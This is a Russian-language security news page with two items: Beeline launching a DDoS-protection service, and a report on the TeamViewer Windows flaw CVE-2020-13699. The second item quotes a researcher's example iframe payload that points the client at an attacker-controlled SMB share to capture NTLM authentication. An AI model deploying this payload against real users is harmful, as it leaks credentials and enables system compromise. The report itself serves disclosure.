«Билайн» запустил услугу «Защита от DDoS-атак» для корпоративных клиентов

...

Группа компаний «ВымпелКом» (бренд «Билайн») объявила о запуске услуги «Защита от DDoS-атак» для корпоративных клиентов. Сервис состоит из нескольких ступеней. Вначале создается профиль трафика web-сайта компании. Далее включается режим мониторинга, при котором происходит постоянное сравнение получаемого интернет-трафика с созданным ранее профилем клиента.

В случае обнаружения DDoS-атаки весь интернет-трафик, направляемый на ресурсы клиента, переключается на маршрут, проходящий через специальное оборудование, где производится его «очистка». Услуга предназначена для защиты WEB-ресурсов компаний, пользующихся интернетом «Билайн», независимо от того, где размещается их сайт - на собственных площадках или в центре данных «Билайн». 

В современном мире интернет является не только источником информации, но и универсальной торговой площадкой, на которой с каждым днем создается все большее количество коммерческих сайтов. «Хакерские DDoS-атаки способны привести бизнес клиентов к большим финансовым потерям, поэтому «Билайн» предлагает надежную систему защиты, позволяющую обеспечить безопасность web-ресурсов своих клиентов», - прокомментировала Оксана Беляева, директор по маркетингу бизнес сегмента и роуминга компании «ВымпелКом».

Anti-Malware TelegramПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

Уязвимость в Windows-клиенте TeamViewer позволяет взламывать пароли

Опасная уязвимость в TeamViewer для Windows может привести к взлому паролей пользователей и, как следствие, к компрометации всей операционной системы. Получившую идентификатор CVE-2020-13699 брешь можно использовать удалённо.

Специалисты советуют особо присмотреться к этой проблеме безопасности, поскольку с приходом COVID-19 TeamViewer для удалённого доступа стали использовать гораздо чаще.

CVE-2020-13699 представляет собой путь поиска или элемент без кавычек. Другими словами, приложение некорректно обрабатывает кастомные URI-хендлеры. Это может привести к эксплуатации в момент посещения вредоносного сайта.

«Атакующий может встроить вредоносный iframe в веб-сайт со специальным URL — iframe src='teamviewer10: --play \\attacker-IP\share\fake.tvs'. Именно эта ссылка запустит десктопный Windows-клиент TeamViewer и заставит его открыть удалённую SMB-шару», — объяснил Джеффри Хофманн, специалист в области кибербезопасности из компании Praetorian.

«Windows при этом осуществит NTLM-аутентификацию и этот запрос злоумышленник может использовать для выполнения кода».

Для успешной атаки киберпреступнику не обязательно проходить процесс аутентификации. Тем не менее в настоящее время нет информации об эксплуатации этой уязвимости в реальных атаках.

Anti-Malware TelegramПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru